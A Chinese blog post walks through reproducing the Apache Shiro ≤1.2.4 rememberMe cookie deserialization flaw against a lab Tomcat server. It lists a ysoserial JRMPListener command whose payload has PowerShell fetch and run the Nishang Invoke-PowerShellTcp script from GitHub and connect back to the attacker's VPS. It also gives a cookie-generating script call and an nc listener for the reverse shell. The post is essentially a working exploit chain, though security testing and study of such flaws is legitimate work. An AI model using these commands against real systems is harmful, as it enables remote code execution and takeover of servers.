Apache Shiro 反序列化

前言

偶然见到大佬玩的这漏洞,学习一下

漏洞范围

Apache Shiro <= 1.2.4

漏洞复现

参考资料:
apache-shiro反序列化远程代码执行漏洞复现

环境搭建

大部分工具大佬已经给出,详见参考资料
靶机
windows10、Tomcat 7.0.70、jdk 1.8、shiro war包
攻击机
vps(ubuntu)、java、shiro_exp_payload.py脚本、ysoserial.jar
直接将大佬的war下载到本地部署到tomcat7.0.70,访问即可

image.png

在进行登录的时候,返回包里存在rememberMe=deleteMe。可判断使用shiro框架。

image.png

漏洞位置

请求包中cookie处存在rememberMe参数,修改cookie可远程命令执行。

命令执行

在vps(144.34.xxx.xx)上开启三个终端
1.vps上执行java命令

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4  "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 144.34.xx.xx  -port 9999"

用来powershell反弹cmd。

2.python脚本生成cookie

python shiro_exp_payload.py  144.34.xx.xx:1099

3.vps监听反弹shell命令

nc -lvp 9999

将生成的cookie放入http的请求包中,即可反弹cmd


image.png
image.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容